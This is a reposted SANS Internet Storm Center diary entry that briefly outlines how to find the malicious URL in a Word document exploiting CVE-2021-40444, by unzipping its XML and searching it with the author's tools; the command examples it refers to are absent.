[SANS ISC] Simple Analysis Of A CVE-2021-40444 .docx Document, (Sat, Sep 18th)

Analysing a malicious Word document like prod.docx that exploits %%cve:2021-40444%% is not difficult.

We need to find the malicious URL in this document. As I’ve shown before, this is quite simple: extract all XML files from the ZIP container (.docx files are OOXML files, that’s a ZIP container with (mostly) XML files) and use a regular expression to search for URLs.

This can be done with my tools zipdump.py and re-search.py:

OOXML files contain a lot of legitimate URLs. Like schemas.microsoft.com. These can be filtered out with my tool re-search.py:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[SANS ISC] ISC Stormcast For Wednesday, August 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7634, (Wed, Aug 18th)

All posts, Sans-ISC

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Source: Read More (SANS Internet Storm Center, InfoCON: green)

Read More

[BleepingComputer] Microsoft releases first Windows 10 build without Internet Explorer

Microsoft has released the first Windows 10 build without the¬†Internet Explorer web browser to¬†Windows Insiders in the Dev Channel. […] Source: Read More (BleepingComputer)

Read More

[ZDNet] Microsoft’s August 2021 Patch Tuesday: 44 flaws fixed, seven critical including Print Spooler vulnerability

All posts, ZDNet

The latest Patch Tuesday saw Microsoft release fixes for 44 different vulnerabilities, including the much-discussed Print Spooler flaw. Source: Read More (Latest topics for ZDNet in Security)

Read More

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.